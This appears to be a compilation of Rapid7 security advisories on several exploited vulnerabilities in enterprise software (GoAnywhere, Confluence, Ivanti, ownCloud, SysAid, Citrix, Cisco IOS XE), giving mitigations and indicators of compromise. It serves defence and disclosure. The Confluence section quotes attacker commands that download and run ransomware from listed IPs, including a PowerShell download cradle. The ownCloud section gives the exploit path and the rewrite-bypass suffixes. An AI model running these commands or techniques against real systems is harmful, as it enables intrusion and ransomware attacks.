Category: Vulnerability Risk Management

On January 22, 2024, Fortra published a security advisory on CVE-2024-0204, a critical authentication bypass affecting its GoAnywhere MFT secure managed file transfer product prior to version 7.4.1. The vulnerability is remotely exploitable and allows an unauthorized user to create an admin user via the administration portal. Fortra lists the root cause of CVE-2024-0204 as CWE-425: Forced Browsing , which is a weakness that occurs when a web application does not adequately enforce authorization on restricted URLs, scripts, or files.

Fortra evidently addressed this vulnerability in a December 7, 2023 release of GoAnywhere MFT, but it would appear they did not issue an advisory until now.

In February 2023, a zero-day vulnerability (CVE-2023-0669) in GoAnywhere MFT was exploited in a large-scale extortion campaign conducted by the Cl0p ransomware group. It’s unclear from Fortra’s initial advisory whether CVE-2024-0204 has been exploited in the wild, but we would expect the vulnerability to be targeted quickly if it has not come under attack already, particularly since the fix has been available to reverse engineer for more than a month. Rapid7 strongly advises GoAnywhere MFT customers to take emergency action.

Mitigation guidance

CVE-2024-0204 affects the following versions of GoAnywhere MFT:

• Fortra GoAnywhere MFT 6.x from 6.0.1
• Fortra GoAnywhere MFT 7.x before 7.4.1

GoAnywhere MFT customers who have not already updated to a fixed version (7.4.1 or higher) should do so on an emergency basis, without waiting for a regular patch cycle to occur.

Per the vendor advisory, “the vulnerability may also be eliminated in non-container deployments by deleting the InitialAccountSetup.xhtml file in the install directory and restarting the services. For container-deployed instances, replace the file with an empty file and restart. For additional information, see https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml (registration required).”

If you are unable to update to a fixed version, Fortra has offered two manual mitigation pathways:

• Deleting the InitialAccountSetup.xhtml file in the installation directory and restarting the services.
• Replacing the InitialAccountSetup.xhtml file with an empty file and restarting the services.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-0204 with an unauthenticated vulnerability check expected to be available in today’s (January 23) content release.

Rapid7 is highlighting two critical vulnerabilities in outdated versions of widely deployed software this week. Atlassian disclosed CVE-2023-22527, a template injection vulnerability in Confluence Server with a maxed-out CVSS score of 10, while VMware pushed a fresh update to its October 2023 vCenter Server advisory on CVE-2023-34048 to note that the vulnerability has now been exploited in the wild.

VMware and Atlassian technologies are mainstays in many corporate environments, and they have historically been targeted by a wide range of adversaries, including in large-scale ransomware campaigns. Rapid7 urges customers to ensure that they are using supported, fixed versions of vCenter Server and Confluence Server in their environments, and that, wherever possible, they are adhering to a high-urgency patching schedule for these products.

VMware vCenter Server CVE-2023-34048

CVE-2023-34048 is a critical out-of-bounds write vulnerability that affects VMware vCenter Server and VMware Cloud Foundation. The vulnerability arises from an out-of-bounds write flaw in vCenter’s implementation of DCERPC, which, if exploited successfully, could lead to remote code execution. It was originally disclosed in October 2023 alongside fixed versions, including for several end-of-life products. Earlier this week, VMware updated their advisory to note that exploitation of CVE-2023-34048 has been observed in the wild. Fixed versions of vCenter Server that remediate CVE-2023-34048 have been available since October 2023.

Per VMware’s advisory, all versions of vCenter Server are vulnerable to CVE-2023-34048 except the following fixed versions (or later):

• 8.0U2
• 8.0U1d
• 7.0U3o

Customers should update on an emergency basis if they have not done so before now. Patches are also available for the following end-of-life versions of vCenter Server: 6.7U3, 6.5U3, and VCF 3.x. VMware has information on applying individual product updates to Cloud Foundation environments here.

For more information, see VMware’s original advisory and FAQ. A list of vCenter Server versions and builds is available here.

Atlassian Confluence Server and Data Center CVE-2023-22527

CVE-2023-22527 is a critical template injection vulnerability in Atlassian Confluence that allows for unauthenticated remote code execution when exploited successfully in vulnerable target environments. As of January 19, 2024, we are not aware of exploitation in the wild targeting CVE-2023-22527.

Affected versions from Atlassian’s advisory:

• 8.0.x
• 8.1.x
• 8.2.x
• 8.3.x
• 8.4.x
• 8.5.0-8.5.3

The most recent supported versions of Confluence Server (as of January 16, 2024) are not affected. Fixed versions for Confluence Server are 8.5.4 and 8.5.5, both of which are on long-term support. For Confluence Data Center, fixed versions are 8.6.0, 8.7.1, and 8.7.2, all of which apply to Confluence Data Center only.

We strongly recommend that Atlassian Confluence customers update to the latest version in their product’s version stream. Customers should refer to the vendor advisory as the source of truth on affected products and fixed versions.

Rapid7 customers

Vulnerability checks for CVE-2023-34048 have been available to InsightVM and Nexpose customers since October 27, 2023. Vulnerability checks for CVE-2023-22527 have been available to InsightVM and Nexpose customers since January 17, 2024.

On Wednesday, January 10, 2024, Ivanti disclosed two zero-day vulnerabilities affecting their Ivanti Connect Secure and Ivanti Policy Secure gateways. Security firm Volexity, who discovered the vulnerabilities, also published a blog with information on indicators of compromise and attacker behavior observed in the wild. In an attack Volexity investigated in December 2023, the two vulnerabilities were chained to gain initial access, deploy webshells, backdoor legitimate files, capture credentials and configuration data, and pivot further into the victim environment.

The two vulnerabilities in the advisory are:

• CVE-2023-46805, an authentication bypass vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure that allows a remote attacker to access restricted resources by bypassing control checks.
• CVE-2024-21887, a critical command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure that allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. This vulnerability can be exploited over the internet

Rapid7 urges customers who use Ivanti Connect Secure or Policy Secure in their environments to take immediate steps to apply the workaround and look for indicators of compromise. Volexity have released an extensive description of the attack and indicators of compromise — we strongly recommend reviewing their blog, which includes the information below:

“Volexity observed the attacker modifying legitimate ICS components and making changes to the system to evade the ICS Integrity Checker Tool. Notably, Volexity observed the attacker backdooring a legitimate CGI file (compcheck.cgi) on the ICS VPN appliance to allow command execution. Further, the attacker also modified a JavaScript file used by the Web SSL VPN component of the device in order to keylog and exfiltrate credentials for users logging into it. The information and credentials collected by the attacker allowed them to pivot to a handful of systems internally, and ultimately gain unfettered access to systems on the network.”

Ivanti Connect Secure, previously known as Pulse Connect Secure, is a security appliance that has been targeted in a range of threat campaigns in recent years. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also released a bulletin on January 10, 2024 urging Ivanti Connect Secure and Ivanti Policy Secure users to mitigate the two vulnerabilities immediately.

Counts of internet-exposed appliances vary widely depending on the query used. The following Shodan query identifies roughly 7K devices on the public internet, while looking for Ivanti’s welcome page alone more than doubles that number (but reduces accuracy): http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo. Rapid7 Labs has observed scanning activity targeting our honeypots that emulate Ivanti Connect Secure appliances.

Mitigation guidance

All supported versions (9.x and 22.x) of Ivanti Connect Secure and Ivanti Policy Secure are vulnerable to CVE-2023-46805 and CVE-2024-21887.  Ivanti’s advisory notes that a workaround is available for CVE-2023-46805 and CVE-2024-21887. Ivanti Connect Secure and Ivanti Policy Secure customers should apply the vendor-supplied workaround immediately and investigate their environments for signs of compromise. Ivanti advises customers using unsupported versions of the product to upgrade to a supported version before applying the workaround.

Ivanti has indicated that patches will be released in a staggered schedule between January 22 and February 19, 2024 — target patch timelines can be found here.

Per Ivanti’s advisory and KB article, “Ivanti Neurons for ZTA gateways cannot be exploited when in production. If a gateway for this solution is generated and left unconnected to a ZTA controller, then there is a risk of exploitation on the generated gateway. Ivanti Neurons for Secure Access is not vulnerable to these CVEs; however, the gateways being managed are independently vulnerable to these CVEs.”

Note: Volexity indicated that adversaries have been observed wiping logs and/or disabling logging on target devices. Administrators should ensure logging is enabled. Ivanti has a built-in integrity checker tool (ICT) that verifies the image on Ivanti Connect Secure and Ivanti Policy Secure appliances and looks for modified files. Ivanti is advising customers to use the external version of this tool to check the integrity of the ICS/IPS images, since Ivanti has seen adversaries “attempting to manipulate” the internal integrity checker tool.

Rapid7 customers

Our engineering team is investigating options for InsightVM and Nexpose coverage for these vulnerabilities. We will provide an update to this blog no later than 3 PM EST on Thursday, January 11, 2024.

Rapid7 is responding to CVE-2023-49103, an unauthenticated information disclosure vulnerability impacting ownCloud.

Background

ownCloud is a file sharing platform designed for enterprise environments. On November 21, 2023, ownCloud disclosed CVE-2023-49103, an unauthenticated information disclosure vulnerability affecting ownCloud, when a vulnerable extension called “Graph API” (graphapi) is present. If ownCloud has been deployed via Docker, from February 2023 onwards, this vulnerable graphapi component is present by default. If ownCloud has been installed manually, the graphapi component is not present by default.

Searching for ownCloud via Shodan indicates there are at least 12,320 instances on the internet (as of Dec 1, 2023). It is unknown how many of these are currently vulnerable.

File transfer and sharing platforms have come under attack from ransomware groups in the past, making this a target of particular concern, as ownCloud is also a file sharing platform. On November 30, 2023, CISA added CVE-2023-49103 to its known exploitable vulnerabilities (KEV) list, indicating threat actors have begun to exploit this vulnerability in the wild. Rapid7 Labs has observed exploit attempts against at least three customer environments as of writing this blog.

The vulnerability allows an unauthenticated attacker to leak sensitive information via the output of the PHP function “phpinfo”, when targeting the URI endpoint “/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php”. This output will include environment variables which may hold secrets, such as user names or passwords that are supplied to the ownCloud system. Specifically, when ownCloud is deployed via Docker, it is common practice to pass secrets via environment variables.

While it was initially thought that Docker installations of ownCloud were not exploitable, Rapid7 researchers have now confirmed (as of Nov 30, 2023) that it is possible to exploit vulnerable Docker based installations of ownCloud, by modifying the requested URI such that it can bypass the existing Apache web server’s rewrite rules, allowing the target URI endpoint to be successfully reached.

Previously, it was thought any attempt to exploit a vulnerable Docker based installation of ownCloud would fail with a HTTP 302 redirect, however using this new technique, it is possible to exploit vulnerable Docker based installation of ownCloud successfully. As Docker passes secrets via environment variables, this allows an attacker to leak secrets such as the OWNCLOUD_ADMIN_USERNAME and OWNCLOUD_ADMIN_PASSWORD environment variables, which will contain the username and password for the admin user, allowing an attacker to login to the affected ownCloud system with administrator privileges.

Timeline of events:

• November 21, 2023 - The vendor ownCloud published an advisory for CVE-2023-49103.
• https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/
• November 22, 2023 - An initial exploit was published, however Rapid7 researchers confirmed (see AttackerKB) this specific exploit is not able to successfully exploit Docker based vulnerable installations of ownCloud.
• https://github.com/creacitysec/CVE-2023-49103
• November 27, 2023 - GreyNoise report observing attempted exploitation as early as November 25, 2023.
• https://www.greynoise.io/blog/cve-2023-49103-owncloud-critical-vulnerability-quickly-exploited-in-the-wild
• November 29, 2023 - Rapid7 research published an AttackerKB assessment, detailing how the current public exploit is not able to successfully exploit vulnerable instances of ownCloud that have been installed via Docker.
• https://attackerkb.com/assessments/a2b1b41a-0a26-4226-a53b-ae72e6c65107
• November 30, 2023 - CISA adds CVE-2023-49103 to its known exploitable vulnerabilities (KEV) list
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• November 30, 2023 - Rapid7 research confirms a technique is available that makes vulnerable docker installations of ownCloud exploitable in a default configuration.

Affected Products

Please note: Information on affected versions or requirements for exploitability may change as we learn more about the threat.

The affected product is the ownCloud Graph API extension, specifically versions 0.2.x before 0.2.1 and 0.3.x before 0.3.1. CVE-2023-49103 has been remediated in version 0.3.1 and 0.2.1 of graphapi, released on September 1st 2023.

You can find more details on the vendor page: https://marketplace.owncloud.com/apps/graphapi

Mitigation guidance

To remediate CVE-2023-49103, the vulnerable graphapi component should be updated to 0.3.1 as per the vendor advisory. If the below file is present in an ownCloud installation, it should be deleted:

/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php

An ownCloud installation may be further hardened by adding the PHP function "phpinfo" to the PHP disabled functions list, in the appropriate PHP ini configuration file. Since disclosing CVE-2023-49103, ownCloud have added this hardening feature to several recent versions of their official Docker container images. Docker containers that were built from Docker images released prior to this addition, will not have the updated hardening applied unless their images are rebuilt.

It is highly recommended to update ownCloud to at least version 10.13.1, as this resolves CVE-2023-49103 when the graphapi is shipped as part of the complete bundle with ownCloud. Version 10.13.1 also resolves two other vulnerabilities, CVE-2023-49104, a subdomain validation bypass in the oauth2 component, and CVE-2023-49105, a WebDAV API authentication bypass. All 3 vulnerabilities were disclosed by ownCloud on November 21, 2023.

Indicators of Compromise

An indicator of compromise for CVE-2023-49103 will be the presence of a HTTP GET request to a URI path containing the following in the Apache server’s access logs.

/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php

A successful request will receive a HTTP 200 response. For example, a successful exploitation attempt against a vulnerable Docker based installation of ownCloud will have a log file entry that looks like this (scroll all the way to the right in the box):

192.168.86.34 - - [01/Dec/2023:09:32:57 +0000] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css HTTP/1.1" 200 30939 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

When exploiting a Docker based installation, the attacker must append an extra path segment to the target URI path, such as `/.css`, in order to bypass the Apache rewrite rules and allow the target endpoint to be successfully reached. Due to how the .htaccess file in ownCloud specifies multiple potential file extensions which bypass the rewrite rules, the additional path segment an attacker can use may be one of several values, as listed below.

/.css
/.js
/.svg
/.gif
/.png
/.html
/.ttf
/.woff
/.ico
/.jpg
/.jpeg
/.json
/.properties
/.min.map
/.js.map
/.auto.map

If a vulnerable ownCloud server has added the PHP function `phpinfo` to its disabled functions list, no content will be returned to the attacker, and the HTTP response will have a Content-Length of zero.

A failed exploitation attempt will see a HTTP response containing a 404 or 302 response code.

Rapid7 Labs has a Sigma rule available to help organizations identify possible exploitation activity related to this vulnerability link: https://github.com/rapid7/Rapid7-Labs/tree/main/Sigma

Rapid7 Customers

InsightVM and Nexpose customers can assess their exposure to CVE-2023-49103 with an authenticated check for unix systems, scheduled for today’s (December 1) content release.

Please note: Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too. This page will serve as the anchor for our findings, product coverage, and other important information that can assist you in mitigating and remediating this threat.

Our aim is to provide you with as much of this information as we can confidently verify, as early as possible, with the understanding that it will take some time for the full picture to emerge. We’ll be updating this blog post in real time as we learn more details about this vulnerability and perform an in-depth technical analysis of the attack vector.

On November 8, 2023, IT service management company SysAid disclosed CVE-2023-47426, a zero-day path traversal vulnerability affecting on-premise SysAid servers. According to Microsoft’s threat intelligence team, who said they discovered the vulnerability, it has been exploited in the wild by DEV-0950 (Lace Tempest) in “limited attacks.” In a social media thread published the evening of November 8, Microsoft emphasized that Lace Tempest distributes the Cl0p ransomware, and that exploitation of CVE-2023-47246 is likely to result in ransomware deployment and/or data exfiltration. Lace Tempest is the same threat actor who perpetrated the MOVEit Transfer and GoAnywhere MFT extortion attacks earlier this year.

SysAid’s advisory on CVE-2023-47246 says the attacker “uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service.” Post-exploitation behavior included deployment of MeshAgent remote administration tooling and GraceWire malware. There are extensive details about the attack chain in the vendor advisory, along with robust indicators of compromise. An employee of technology company Elastic also reported the evening of November 8 that Elastic had observed exploitation in the wild as far back as October 30.

SysAid’s website claims that the company has upwards of 5,000 customers, including a number of large corporations whose logos adorn SysAid’s customer page. Shodan searches for either a specific CSS file or the favicon both return only 416 instances of SysAid exposed to the public internet. (Note that “exposed” does not necessarily imply that those instances are vulnerable.)

Mitigation guidance

CVE-2023-47246 is fixed in version 23.3.36 of SysAid server. Given the potential for ransomware and extortion attacks, organizations with on-premise SysAid servers should apply the vendor-supplied patches on an emergency basis, invoking incident response procedures if possible, and ensure the server is not exposed to the public internet. We also strongly recommend reviewing the indicators of compromise in SysAid’s advisory and examining environments for suspicious activity, though notably, the advisory says the adversaries may cover their tracks by cleaning up logs and artifacts on disk.

Indicators of compromise

SysAid has an extensive list of IOCs and observed attacker behavior in their advisory. Rather than reproducing that here, we urge organizations to use that vendor advisory as their starting source of truth for threat hunting: https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification

Rapid7 has a Velociraptor artifact available to help organizations identify post-exploitation activity related to this zero-day vulnerability:

• Yara.Process: Targets observed malware and Cobalt Strike via process YARA
• Disk.Ntfs: Targets known disk IOCs via Windows.ntfs.mft
• Forensic.Usn: Targets known disk IOCs via USN journal
• Evtx.Defender: Searches Defender event logs for evidence of associated alerts
• Evtx.NetworkIOC: Targets known strings of network IOCs in firewall, Sysmon and PowerShell logs.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2023-47246 with an authenticated Windows check expected to ship in today’s (November 9) content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on post-exploitation behavior related to this zero-day vulnerability:

• Attacker Technique - SpoolSV Spawns CMD or PowerShell
• Attacker Technique - Possible Process Injection
• Attacker Technique - PowerShell Download Cradles
• Attacker Tool - CobaltStrike PowerShell Commands
• Suspicious Network Connection - Destination Address in Cobalt Strike C2 List

Daniel Lydon and Conor Quinn contributed attacker behavior insights to this blog.

As of November 5, 2023, Rapid7 Managed Detection and Response (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, including for ransomware deployment. We have confirmed that at least some of the exploits are targeting CVE-2023-22518, an improper authorization vulnerability affecting Confluence Data Center and Confluence Server. Atlassian published an advisory for the vulnerability on October 31, 2023. MDR has also observed attempts to exploit CVE-2023-22515, a critical broken access control vulnerability in Confluence that came to light on October 4.

Atlassian updated their advisory for CVE-2023-22518 on November 3 to note that exploitation of the vulnerability had been reported to them by a customer.

Observed attacker behavior

Beginning November 5, 2023, Rapid7 MDR began responding to exploitation of Confluence Server within various customer environments. The alerts we observed occurred between 2023-11-05 10:08:34 and 23:05:35 UTC.

The process execution chain, for the most part, is consistent across multiple environments, indicating possible mass exploitation of vulnerable internet-facing Atlassian Confluence servers.

Rapid7 observed POST requests in HTTP access logs (/atlassian/confluence/logs) on both Windows and Linux. The requests were sent to /json/setup-restore.action?synchronous=true, as seen in the example below:

[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 193.176.179[.]41 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:09 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/?os_authType=basic HTTP/1.1 200 153ms 388712 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 404 3ms 40 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /rest/plugins/1.0/?token=-TOKENNUM HTTP/1.1 202 26ms 344 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:11 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 4ms 229 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 3ms 274 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 27ms 212 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 13ms 283 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 14ms 556 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:18 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 204 129ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36

Rapid7 managed services observed the following processes on the host systems as part of exploitation:

• Linux

Parent process:

/opt/atlassian/confluence/jre//bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=XXXX -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-YYYY-MM-DD_XX-XX-XX.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-YYYY-MM-DD_XX-XX-XX.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start

Child process:

/usr/bin/bash -c whoami
Additional Commands (decoded and deobfuscated):
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru

• Windows

Parent process:

"DRIVE:\Confluence\Confluence\bin\tomcat9.exe" "//RS//Confluence"

Child processes:

cmd /c whoami 

Additional Commands (decoded and deobfuscated):
IEX((New-Object Net.WebClient).DownloadString("hxxp[:]//193[.]176[.]179[.]41/tmp.37")) 

Post-exploitation behavior

After the initial enumeration activity (whoami command spawned via Bash), the adversary executed Base64 commands to spawn follow-on commands via python2 or python3.

/usr/bin/bash -c whoami
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
uname -p 2> /dev/null (spawned by /usr/bin/python3.6)
/usr/bin/id -u (spawned by /usr/bin/python3.6)
/bin/chmod +x ./qnetd (spawned by /usr/bin/python3.6)
/bin/chmod 755 ./qnetd (spawned by /usr/bin/python3.6)
/tmp/qnetd (ransomware execution)

—-----------------------------------------
/usr/bin/bash -c whoami
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru
curl -s hxxp://193.43.72[.]11/mdrg.sh || wget -q -O- hxxp://193.43.72[.]11/mdrg[.]sh)%7Csh 
/usr/bin/cat /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/uname -m (spawned by /usr/bin/bash)
/usr/bin/rm -rf /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/rm -rf sh (spawned by /usr/bin/bash)
/usr/bin/id -u (spawned by /usr/bin/bash) 
/usr/bin/rm -rf ./qnetd(spawned by /usr/bin/bash)
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/bash)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/bash)
/usr/bin/rm -rf ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/uname -p (spawned by /usr/bin/python2.7)
/usr/bin/id -u (spawned by /usr/bin/python2.7) 
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/python2.7)
/tmp/qnetd (ransomware execution)

In multiple attack chains, Rapid7 observed post-exploitation command execution to download a malicious payload hosted at 193.43.72[.]11 and/or 193.176.179[.]41, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.

Mitigation guidance

All versions of Confluence Server and Confluence Data Center are vulnerable to CVE-2023-22518. The vulnerability has been remediated in the following fixed versions:

• 7.19.16
• 8.3.4
• 8.4.4
• 8.5.3
• 8.6.1

Atlassian Cloud users are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

Customers should update to a fixed version of Confluence on an emergency basis, restricting external access to the application at least until they are able to remediate. If you are unable to restrict access to the application or update on an emergency basis, Atlassian’s advisory includes interim measures you can take to mitigate risk from known attack vectors. As always, Rapid7 strongly recommends applying vendor-supplied patches rather than relying solely on temporary mitigations.

Indicators of compromise

IP addresses:

• 193.176.179[.]41
• 193.43.72[.]11
• 45.145.6[.]112

Domains:
j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion

File hashes:

• Bat file: /tmp/agttydcb.bat - MD5: 81b760d4057c7c704f18c3f6b3e6b2c4

• ELF ransomware binary: /tmp/qnetd - SHA256: 4ed46b98d047f5ed26553c6f4fded7209933ca9632b998d265870e3557a5cdfe

Ransom note: read-me3.txt

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2023-22518 with an unauthenticated check available as of the November 1, 2023 content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. The following detection rules are deployed and alerting on activity related to Atlassian Confluence exploitation:

• Suspicious Process - Confluence Java App Launching Processes
• Webshell - Commands Launched by Webserver

On October 10, 2023, Citrix published an advisory on two vulnerabilities affecting NetScaler ADC and NetScaler Gateway. The more critical of these two issues is CVE-2023-4966, a sensitive information disclosure vulnerability that allows an attacker to read large amounts of memory after the end of a buffer. Notably, that memory includes session tokens, which permits an attacker to impersonate another authenticated user. On October 17, Citrix updated the advisory to indicate that they have observed exploitation in the wild. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added CVE-2023-4966 to their Known Exploited Vulnerabilities (KEV) catalog.

On October 25, 2023, security firm Assetnote released an analysis, including a proof of concept, that demonstrates how to steal session tokens. Since then, Shadowserver has noted an uptick in scanning for that endpoint. Rapid7 MDR is investigating potential exploitation of this vulnerability in a customer environment but is not yet able to confirm with high confidence that CVE-2023-4966 was the initial access vector.

Rapid7 recommends taking emergency action to mitigate CVE-2023-4966. Threat actors, including ransomware groups, have historically shown strong interest in Citrix NetScaler ADC vulnerabilities. We expect exploitation to increase. Our research team has a technical assessment of the vulnerability and its impact in AttackerKB.

Affected Products

Citrix published a blog on October 23 that has exploitation and mitigation details. Their advisory indicates that CVE-2023-4966 affects the following supported versions of NetScaler ADC and NetScaler Gateway:

* NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50

* NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15

* NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19

* NetScaler ADC 13.1-FIPS before 13.1-37.164

* NetScaler ADC 12.1-FIPS before 12.1-55.300

* NetScaler ADC 12.1-NDcPP before 12.1-55.300

Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and is vulnerable.

In order to be exploitable, the appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server (which is a very common configuration). Citrix has indicated that customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.

Mitigation Guidance

Citrix NetScaler ADC and Gateway users should update to a fixed version immediately, without waiting for a typical patch cycle to occur. Additionally, Citrix’s blog on CVE-2023-4966 recommends killing all active and persistent sessions using the following commands:

kill icaconnection -all

kill rdp connection -all

kill pcoipConnection -all

kill aaa session -all

clear lb persistentSessions

For more information, see Citrix’s advisory.

Rapid7 Customers

InsightVM and Nexpose customers can assess their exposure to both of the CVEs in Citrix’s advisory (CVE-2023-4966, CVE-2023-4967) with authenticated vulnerability checks available in the October 23 content release.

On Monday, October 16, Cisco’s Talos group published a blog on an active threat campaign exploiting CVE-2023-20198, a “previously unknown” zero-day vulnerability in the web UI component of Cisco IOS XE software. IOS XE is an operating system that runs on a wide range of Cisco networking devices, including routers, switches, wireless controllers, access points, and more. Successful exploitation of CVE-2023-20198 allows a remote, unauthenticated attacker to create an account on an affected device and use that account to obtain full administrator privileges, effectively enabling a complete takeover of the system.

There is no patch for CVE-2023-20198 as of October 17, 2023. As Cisco Talos noted in their blog, it is being actively exploited in the wild. There appear to be a significant number of devices running IOS XE on the public internet as of October 17. Estimates of internet-exposed devices running IOS XE vary, but the attack surface area does appear to be relatively large; one estimate puts the exposed device population at 140K+.

In the activity Cisco observed, attackers created (malicious) local user accounts from suspicious IP addresses. Additional activity has included deployment of an implant that allows the attacker to execute arbitrary commands at the system level or IOS level. Cisco has an extensive description of the malicious behavior they’ve observed here.

Affected products

